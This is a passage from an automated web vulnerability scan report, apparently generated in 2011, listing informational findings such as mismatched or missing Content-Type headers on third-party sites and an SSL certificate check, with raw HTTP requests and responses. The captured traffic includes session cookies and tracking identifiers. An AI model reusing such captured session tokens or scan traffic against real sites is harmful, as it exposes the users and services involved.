User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: StnTz5pY
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=49=bUlBHSw9RyrvSttR5U3rNRUYEyCIoOHEeyqLUjvZvJYsnwvg_xFWbDFu8wRsyPCX0JzpkjV16vXwqOAIqiLeg1KuBr3sTsQOG_a12u1qyWQimnfWv4FY2HkQyWm7z0tD

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:22:21 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 22722

BfyINKgQ....S.......J..k...=.....}s#..Scrum.7$..YHZMlTs-LNIr40gHfpLjSCg",kEXPI:"17259,23756,24692,24878,24879,27400,28505,29702,29859,30316,30465,30727,31388,31406,31493",kCSI:{e:"17259,23756,24692,24
...[SNIP]...

29.45. http://www.googlelabs.com/show_app_thumbnail previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.googlelabs.com
Path:	/show_app_thumbnail

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /show_app_thumbnail?app_key=agtnbGFiczIwLXd3d3IVCxIMTGFic0FwcE1vZGVsGKmMtwIM HTTP/1.1
Host: www.googlelabs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.googlelabs.com/

Response

HTTP/1.1 200 OK
Content-Language: en-us
Content-Type: image/png
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: public, max-age=604800
Date: Tue, 19 Jul 2011 20:47:35 GMT
Server: Google Frontend
Content-Length: 2582

GIF89aN.N....c.f..h..l..n..q..t..w..z..~..............................................................................................................................................................
...[SNIP]...

29.46. http://www.mookie1.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mookie1.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_xxx_qppm_iuuq=ffffffff0949011c45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:17 GMT
Server: Apache
Last-Modified: Tue, 04 Aug 2009 20:27:52 GMT
ETag: "11a1dbe-57e-47056b8840200"
Accept-Ranges: bytes
Cteonnt-Length: 1406
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain; charset=UTF-8
Cache-Control: private
Content-Length: 1406

..............h.......(....... ....................................0...1................................................................................................................................
...[SNIP]...

29.47. http://www.netlogiq.ro/ajaxpro/Layout,App_Web_glwxmlys.ashx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.netlogiq.ro
Path:	/ajaxpro/Layout,App_Web_glwxmlys.ashx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

POST /ajaxpro/Layout,App_Web_glwxmlys.ashx HTTP/1.1
Host: www.netlogiq.ro
Proxy-Connection: keep-alive
Referer: http://www.netlogiq.ro/
Content-Length: 9
Origin: http://www.netlogiq.ro
X-AjaxPro-Method: RemoveProduct
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: text/plain; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rlrppqzm2x1g1e45vesnu245; sifrFetch=true; __utma=147345704.25025431.1311097255.1311097255.1311097255.1; __utmb=147345704.1.10.1311097255; __utmc=147345704; __utmz=147345704.1311097255.1.1.utmcsr=umfcluj.ro|utmccn=(referral)|utmcmd=referral|utmcct=/search.aspx

{"vID":0}

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: Products=; expires=Mon, 18-Jul-2011 17:40:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:40:42 GMT
Content-Length: 5

[];/*

29.48. http://www.rallydev.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.rallydev.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.rallydev.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=2g3gkrl3hj7h7nuupane9re3r3; __utma=45646267.1491315281.1311085247.1311085247.1311085247.1; __utmb=45646267.1.10.1311085247; __utmc=45646267; __utmz=45646267.1311085247.1.1.utmgclid=CMWl_YzNjaoCFYpd5Qodq3Z4og|utmccn=(not%20set)|utmcmd=(not%20set)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:49 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 21 Feb 2011 18:49:27 GMT
ETag: "627e-49ccf52bb1bc0"
Accept-Ranges: bytes
Cache-Control: max-age=86401, public
Expires: Wed, 20 Jul 2011 14:20:50 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NON DSP COR CURa PSAa PSDa OUR NOR BUS PUR COM NAV STA"
Content-Length: 25214
Content-Type: text/plain; charset=UTF-8

.... .........(...............h............. .h...&... .............. ..........v... .... .........00......h....'..00..............00.... ..%...<..(....... ......................................f..
...[SNIP]...

29.49. http://www.res-x.com/ws/r2/Resonance.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.res-x.com
Path:	/ws/r2/Resonance.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ws/r2/Resonance.aspx?appid=GAMESTOP01&tk=783322707284241&ss=463845686754211&sg=1&pg=res11071909286917156673463&vr=3.5x&bx=false&ur=http%3A//www.gamestop.com/&plk=952714%7Chome_rr;952810%7Chome_rr;930404%7Chome_rr;952680%7Chome_rr;952223%7Chome_rr;952722%7Chome_rr;60822;63851;39213;74392;62255;60655;75847;91832;90818;90820;90819;90578;60227;89429;91018;91051;60822;64525;84723;1499;90414;91052;75763;7882;64004;90860;91538;78346;78062;75737;42694;68371;90216;74240;89143;75200;90173;91255;72574;90175;89141;90445;91020;90367;&rf= HTTP/1.1
Host: www.res-x.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR CUR PSA PSD OUR IND UNI"
Date: Tue, 19 Jul 2011 16:04:40 GMT
Content-Length: 10

29.50. http://www.seapine.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.seapine.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.seapine.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SourceKey=201107191020391579; __utma=192179752.1795370187.1311085249.1311085249.1311085249.1; __utmb=192179752.1.10.1311085249; __utmc=192179752; __utmz=192179752.1311085249.1.1.utmcsr=GoogleAdwords|utmccn=BugTrackingAdgroup|utmcmd=Search; _mkto_trk=id:624-VQC-743&token:_mch-seapine.com-1311085249503-78743

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:59 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 16 Jul 2007 14:11:19 GMT
ETag: "57d6-8e2efc0"
Accept-Ranges: bytes
Content-Length: 22486
Cache-Control: max-age=29030400
Expires: Tue, 19 Jun 2012 14:20:59 GMT
Content-Type: text/plain

......00..........f... ......................h.......00.... ..%...... .... ......B........ .h...nS..(...0...`.................................J.......z.......b...............n...........V...........
...[SNIP]...

29.51. http://www.stubhub.com/content/getPromoContent previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.stubhub.com
Path:	/content/getPromoContent

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

29.52. http://www.stubhub.com/favicon.ico previous

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.stubhub.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

30. Content type is not specified previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nne.aaa.com
Path:	/favicon.ico

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /favicon.ico HTTP/1.1
Host: www.nne.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: zipcode=05672|AAA|36; acezipcode=36|AAA|05672; surveysessioncookie=surveysessioncookie.showsurvey=NO; CP=null*; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue; CT_TestId=0; CT_Plmnt=; CT_ENTRYURL=http%3A//www.nne.aaa.com/en-nne/Pages/Home.aspx%3Fzip%3D05672%26referer%3Dwww.aaa.com; CT_CrtDate=7/19/2011%2014%3A4%3A44; CT_UID=1311102284607.1287; CT_Type=1; __utma=169044862.685047069.1311102284.1311102284.1311102284.1; __utmb=169044862.1.10.1311102284; __utmc=169044862; __utmz=169044862.1311102284.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1311102284568%7C1313694284568%3B

Response

HTTP/1.1 404 NOT FOUND
Date: Tue, 19 Jul 2011 19:04:44 GMT
Server: Microsoft-IIS/6.0
ACSC: WEB04
X-Powered-By: ASP.NET
Exires: Mon, 04 Jul 2011 19:04:44 GMT
Cache-Control: private,max-age=0
Content-Length: 13
Public-Extension: http://schemas.microsoft.com/repl-2

404 NOT FOUND

31. SSL certificate previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://manager.linode.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.linode.com
Issued by:	Equifax Secure Certificate Authority
Valid from:	Mon May 03 14:39:54 CDT 2010
Valid to:	Thu Jul 04 17:58:12 CDT 2013

Certificate chain #1

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 11:41:51 CDT 1998
Valid to:	Wed Aug 22 11:41:51 CDT 2018

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by XSS.CX at Wed Jul 20 07:45:44 CDT 2011.